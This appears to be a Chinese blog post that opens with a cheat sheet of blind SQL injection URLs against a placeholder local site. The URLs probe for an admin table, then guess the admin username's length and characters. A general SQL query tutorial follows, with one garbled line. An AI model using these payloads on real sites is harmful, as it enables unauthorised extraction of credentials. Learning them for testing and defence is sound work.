`
zpball
  • 浏览: 916729 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

常用sql注入语句

阅读更多
检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)


检测表段的


http://127.0.0.1/xx?id=11 and exists (select * from admin)


检测字段的


http://127.0.0.1/xx?id=11 and exists (select username from admin)


检测ID


http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)


检测长度的


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)



检测长度的


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)


检测是否为MSSQL数据库


http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)


检测是否为英文


(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)


(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)


检测英文的范围


(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)


(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)


检测那个字符


(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)


(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)


常用函数


Access:asc(字符) SQLServer:unicode(字符)

作用:返回某字符的ASCII码


Access:chr(数字) SQLServer:nchar(数字)

作用:与asc相反,根据ASCII码返回字符


Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)

作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串


Access:abc(数字) SQLServer:abc (数字)

作用:返回数字的绝对值(在猜解汉字的时候会用到)


Access:A between B And C SQLServer:A between B And C

作用:判断A是否界于B与C之间


and exists(Select top 1 * From 用户 order by id)



1.在查询结果中显示列名:

a.用as关键字:select name as ’姓名’ from students order by age

b.直接表示:select name ’姓名’ from students order by age


2.精确查找:

a.用in限定范围:select * from students where native in (’湖南’, ’四川’)

b.between...and:select * from students where age between 20 and 30

c.“=”:select * from students where name = ’李山’

d.like:select * from students where name like ’李%’ (注意查询条件中有“%”,则说明是部分匹配,而且还有先后信息在里面,即查找以“李”开头的匹配项。所以若查询有“李”的所有对象,应该命令:’%李%’;若是第二个字为李,则应为’_李%’或’_李’或’_李_’。)

e.[]匹配检查符:select * from courses where cno like ’[AC]%’ (表示或的关系,与"in(...)"类似,而且"[]"可以表示范围,如:select * from courses where cno like ’[A-C]%’)



3.对于时间类型变量的处理

a.smalldatetime:直接按照字符串处理的方式进行处理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’



4.集函数

a.count()求和,如:select count(*) from students (求学生总人数)

b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’

c.max(列)和min(列),求最大与最小


5.分组group

常用于统计时,如分组查总数:select gender,count(sno) from students group by gender(查看男女学生各有多少)

注意:从哪种角度分组就从哪列"group by"

对于多重分组,只需将分组规则罗列。比如查询各届各专业的男女同学人数 ,那么分组规则有:届别(grade)、专业(mno)和

性别(gender),所以有"group by grade, mno, gender"

select grade, mno, gender, count(*) from students group by grade, mno, gender

通常group还和having联用,比如查询1门课以上不及格的学生,则按学号(sno)分类有:

select sno,count(*) from grades where mark<60 group by sno having count(*)>1



6.UNION联合

合并查询结果,如:

Select * FROM students Where name like ‘张%’UNION [ALL] Select * FROM students Where name like ‘李%’



7.多表查询

a.内连接

select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno

(注意可以引用别名)

b.外连接

b1.左连接

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno
左连接特点:显示全部左边表中的所有项目,即使其中有些项中的数据未填写完全。


左外连接返回那些存在于左表而右表中却没有的行,再加上内连接的行。

b2.右连接

与左连接类似

b3.全连接

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno

两边表中的内容全部显示

c.自身连接

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno

采用别名解决问题。

d.交*连接

select lastname+firstname from lastname CROSS JOIN firstanme

相当于做笛卡儿积



8.嵌套查询

a.用关键字IN,如查询猪猪山的同乡:

select * from students where native in (select native from students where name=’猪猪’)

b.使用关键字EXIST,比如,下面两句是等价的:

select * from students where sno in (select sno from grades where cno=’B2’)


select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)



9.关于排序order

a.对于排序order,有两种方法:asc升序和desc降序

b.对于排序order,可以按照查询条件中的某项排列,而且这项可用数字表示,如:

select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3


10.其他

a.对于有空格的识别名称,应该用"[]"括住。

b.对于某列中没有数据的特定查询可以用null判断,如select sno,courseno from grades where mark IS NULL

c.注意区分在嵌套查询中使用的any与all的区别,any相当于逻辑运算“||”而all则相当于逻辑运算“&&”

d.注意在做否定意义的查询是小心进入陷阱:

如,没有选修‘B2’课程的学生 :

select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’

上面的查询方式是错误的,正确方式见下方:

select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’)


11.关于有难度多重嵌套查询的解决思想:如,选修了全睝@纬痰难 ?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))

最外一重:从学生表中选,排除那些有课没选的。用not exist。由于讨论对象是课程,所以第二重查询从course表中找,排除那些选了课的即可
分享到:
评论

相关推荐

    常用Sql注入语句.

    本文将深入探讨“常用Sql注入语句”这一主题,并基于提供的资源进行详细阐述。 1. SQL注入基本原理: SQL注入是攻击者通过输入恶意的SQL代码到应用的输入字段,欺骗服务器执行非预期的数据库操作。当应用程序没有...

    渗透常用SQL注入语句大全.doc

    渗透常用SQL注入语句大全 SQL 注入是一种常见的 Web 应用程序安全漏洞,攻击者可以通过在输入参数中注入恶意的 SQL 代码来获取或修改敏感数据。本文档中提供了一些常用的 SQL 注入语句,旨在帮助开发者和安全测试...

    DB2数据库SQL注入语句

    本文将深入探讨DB2数据库中的SQL注入语句,以及如何通过这些语句来猜解数据库结构和数据。 首先,SQL注入的基础原理是通过在合法的SQL查询语句中嵌入恶意代码,以改变原本的查询逻辑。在给定的示例中,攻击者试图猜...

    手工SQL注入常用SQL语句

    #### 常用SQL注入技巧 - **测试SQL注入** - **布尔盲注**:通过构造带有`AND 1=1`和`AND 1=2`的URL来测试是否可以注入。如果页面显示正常,则表示可能存在SQL注入漏洞。 - **错误注入**:利用错误消息来确定是否...

    sql注入攻击常用语句总结

    sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴

    SQL注入攻击常用语句(非常全,不可错过)

    ### SQL注入攻击常用语句详解 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL代码,利用Web应用程序对用户输入数据的处理不当,来执行非授权的数据库操作。本文将详细...

    手工注入常用SQL语句.txt

    手工SQL注入通常涉及利用已知漏洞,通过精心构造的SQL语句来探测数据库结构和数据。 ### 2. Access数据库的手工SQL注入示例 对于Access数据库,可以通过以下方式进行手工SQL注入: - `and (select id from ...

    sql注入讲解ppt.pptx

    七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET ...

    安全测试-常见sql注入方法,命令

    安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...

    基础常用SQL语句.pdf

    基础常用SQL语句 本文档总结了基础常用的SQL语句,涵盖了MYSQL基础语句、数据库创建、数据表创建、数据插入、查询、更新、删除、子句、连接、NULL值处理、正则表达式、ALTER命令、服务器元数据、MYSQL及SQL注入、...

    SQL注入常用语句功能与技巧.rar

    SQL注入常用语句功能与技巧,每句都是经典。希望对想学注入的朋友们有用。。。。。

    开发常用的SQL语句

    然而,动态SQL也存在安全风险,如SQL注入攻击,因此在实际应用中应谨慎使用,并采取相应的预防措施,比如参数化查询。 ### 总结 掌握这些常用的SQL语句对于任何从事软件开发工作的人员来说都是至关重要的。它们...

    SQL注入fuzz字典

    sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。

    SQL注入之如何检测与判断详细过程

    **盲注**是在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面的一种情况。这时,我们需要通过特殊的方法来判断或尝试获取信息。以下是一些常用的盲注payload示例: - **TRUE/FALSE判断**:使用逻辑...

    SQL注入基础2.pdf

    在本材料中,主要介绍了寻找SQL注入漏洞的方法、判断注入漏洞的依据、常用测试语句和技巧,以及不同数据库类型之间的差异和如何利用这些差异进行攻击。根据不同的数据库类型(如SQL Server、MySQL、Oracle),攻击者...

    Java防止SQL注入的几个途径

    SQL 注入攻击是黑客最常用的攻击方式之一,它可以让攻击者访问或修改数据库中的敏感信息。因此,防止 SQL 注入是 Java 开发者必须注意的安全问题。 1.杜绝 SQL 拼接 最简单的办法是杜绝 SQL 拼接。SQL 注入攻击能...

    sql注入的常用命令

    ### SQL注入常用命令详解 #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来控制数据库执行非授权操作。为了帮助初学者更好地理解和掌握SQL注入的基本原理及...

    sql注入原理简介

    在Web开发中,预防SQL注入的常用方法包括使用PreparedStatement、使用存储过程、对所有输入进行验证,以及使用ORM框架等。通过这些技术手段,可以有效地阻止恶意用户通过SQL注入攻击的方式,获取敏感数据或破坏...

Global site tag (gtag.js) - Google Analytics